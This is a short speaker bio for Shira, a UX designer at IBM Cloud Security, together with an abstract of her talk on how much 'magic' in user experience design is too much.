Shira is a Senior UX Designer at IBM Cloud Security.

She has a B.Sc. in computer science. After several years as a developer, she realized that her true calling is understanding who her users are, finding out what motivates them and creating a product that they will love to use.

For the past 10 years she has been consulting and designing experiences for companies ranging in size from start-ups to enterprises.

Sometimes when we design experiences, we are able to create ‘magic’ moments – where things just work without having to do much. But how much magic is too much? We will discuss how to delight users without leaving them disoriented or uncomfortable.
